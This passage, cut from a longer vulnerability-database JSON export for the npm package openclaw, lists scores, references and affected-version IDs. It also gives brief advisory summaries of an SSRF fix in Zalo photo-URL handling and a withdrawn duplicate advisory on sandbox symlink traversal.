y2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-41384","GHSA-vfw7-6rhc-6xxg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jhah-j2td-t3dp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/93303?format=json","vulnerability_id":"VCID-jshg-1pb2-wbak","summary":"OpenClaw validates Zalo outbound photo URLs through the SSRF guard\n## Summary\nZalo outbound photo URLs are validated through the SSRF guard.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nThe Zalo plugin could forward an attacker-controlled outbound photo URL to the Zalo Bot API without first applying OpenClaw's SSRF validation policy.\n\n## Fix\nZalo sendPhoto now parses and validates outbound photo URLs with the shared SSRF hostname policy before posting to Zalo, and media-reply paths route through the guarded outbound media helpers.\n\n## Fix Commit(s)\n- a65eb1b864b7630c1242a82de9e5799b80583c3f\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @foodlook for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44116","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13839","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13842","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.1519","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44116"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a65eb1b864b7630c1242a82de9e5799b80583c3f","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a65eb1b864b7630c1242a82de9e5799b80583c3f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2hh7-c75g-qj2r","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2hh7-c75g-qj2r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44116","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44116"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-zalo-photo-url-validation","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-zalo-photo-url-validation"},{"reference_url":"https://github.com/advisories/GHSA-2hh7-c75g-qj2r","reference_id":"GHSA-2hh7-c75g-qj2r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2hh7-c75g-qj2r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-44116","GHSA-2hh7-c75g-qj2r"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jshg-1pb2-wbak"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91697?format=json","vulnerability_id":"VCID-jtjv-j6yj-93et","summary":"Duplicate Advisory: OpenClaw: stageSandboxMedia destination symlink traversal can overwrite files outside sandbox workspace\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-cfvj-7rx7-fc7c. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.3.2 contain a vulnerability in the stageSandboxMedia function in which it fails to validate destination symlinks during media staging, allowing writes to follow symlinks outside the sandbox workspace. Attackers can exploit this by placing symlinks in the media/inbound directory to overwrite arbitrary files on the host system outside sandbox boundaries.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/17ede52a4be3034f6ec4b883ac6b81ad0101558a","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/17ede52a4be3034f6ec4b883ac6b81ad0101558a"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-stagesandboxmedia-destination","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-stagesandboxmedia-destination"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31990","reference_id":"CVE-2026-31990","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31990"},{"reference_url":"https://github.com/advisories/GHSA-2cwr-f5hx-gg3w","reference_id":"GHSA-2cwr-f5hx-gg3w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2cwr-f5hx-gg3w"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cfvj-7rx7-fc7c","reference_id":"GHSA-cfvj-7rx7-fc7c","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cfvj-7rx7-fc7c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/978873?format=json","purl":"pkg:npm/openclaw@2026.3.2-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnera